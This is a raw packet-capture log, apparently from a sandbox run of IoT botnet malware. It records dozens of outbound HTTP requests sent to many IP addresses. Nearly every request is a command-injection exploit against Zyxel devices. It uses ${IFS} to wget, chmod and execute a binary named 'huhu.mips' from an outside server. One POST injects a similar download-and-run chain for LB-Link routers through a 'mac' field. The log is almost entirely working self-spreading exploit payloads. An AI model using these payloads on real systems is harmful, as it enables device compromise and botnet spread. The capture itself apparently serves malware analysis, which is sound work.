                                                      Feb 2, 2024 06:35:49.562871933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3613192.168.2.146012088.72.181.63443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.562937975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3614192.168.2.1447236107.90.251.217443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.562961102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3615192.168.2.145430880.251.100.31443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.563007116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3616192.168.2.1458380118.102.56.68443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.563060999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3617192.168.2.1457630144.50.45.19443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.563103914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3618192.168.2.1435038221.76.75.73443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.563149929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3619192.168.2.145928472.152.63.36443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.563165903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3620192.168.2.145440888.176.11.172443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.563226938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3621192.168.2.1454004118.178.174.75443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.563256979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3622192.168.2.145079046.37.128.41443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.563302994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3623192.168.2.1450254171.169.180.238443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.563329935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3624192.168.2.1443388192.113.188.165443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.563363075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3625192.168.2.1447006106.77.189.22443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.563409090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3626192.168.2.144126252.207.163.247443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.563436031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3627192.168.2.144690025.186.169.134443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.563476086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3628192.168.2.1438280166.137.116.98443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.563504934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3629192.168.2.1434826188.121.110.88443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.563549995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3630192.168.2.145563469.130.207.242443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.563602924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3631192.168.2.145574699.7.190.57443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.563618898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3632192.168.2.1447260133.237.53.7443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.563668013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3633192.168.2.143783848.111.84.119443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.563700914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3634192.168.2.1435430220.143.49.203443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.563746929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3635192.168.2.1433204199.204.171.44443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.563802004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3636192.168.2.143504481.110.183.15443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.563827991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3637192.168.2.143963212.180.122.132443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.563879967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3638192.168.2.145057671.6.200.42443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.563908100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3639192.168.2.1444858223.28.209.116443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.563967943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3640192.168.2.1435198189.23.29.23443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.564006090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3641192.168.2.1445488196.198.170.136443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.564034939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3642192.168.2.1453970126.87.103.155443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.564064980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3643192.168.2.144410413.161.58.188443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.564105034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3644192.168.2.145815417.59.173.30443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.564141989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3645192.168.2.1443286105.116.197.238443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.564189911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3646192.168.2.145047294.214.237.234443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.564210892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3647192.168.2.1456726186.158.200.73443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.564244032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3648192.168.2.1446476212.1.35.17443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.564266920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3649192.168.2.1439098188.235.162.206443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.564332962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3650192.168.2.143311023.236.149.59443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.564379930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3651192.168.2.145731044.110.144.100443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.564429998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3652192.168.2.1450544106.74.24.167443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.564471006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3653192.168.2.1448500109.98.246.139443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.564512014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3654192.168.2.1436252132.97.194.119443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.564557076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3655192.168.2.1442962158.182.186.38443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.568150997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3656192.168.2.1456534202.183.165.868080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.871907949 CET237OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                      Cookie: user=admin
                                                      Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                      Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.180.149.156/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                                      Feb 2, 2024 06:35:50.229388952 CET337INHTTP/1.1 400 Bad Request
                                                      Server: nginx/1.11.3
                                                      Date: Fri, 02 Feb 2024 04:49:12 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 173
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 31 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.11.3</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3657192.168.2.143337840.152.90.149443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.575897932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3658192.168.2.1436900136.207.52.254443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.575933933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3659192.168.2.1458684128.141.203.38443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.575968981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3660192.168.2.1439856106.221.186.253443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.576005936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3661192.168.2.143495647.171.150.202443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.576051950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3662192.168.2.14352108.94.110.110443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.576101065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3663192.168.2.145026074.19.3.72443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.576172113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3664192.168.2.144835059.1.40.117443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.576225042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3665192.168.2.1433274195.26.57.9443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.576251984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3666192.168.2.1460362174.18.70.117443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.576287985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3667192.168.2.1435324209.73.194.218443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.576319933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3668192.168.2.143521449.88.235.195443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.576368093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3669192.168.2.143279619.51.27.23443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.576397896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3670192.168.2.145490061.101.158.252443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.576431036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


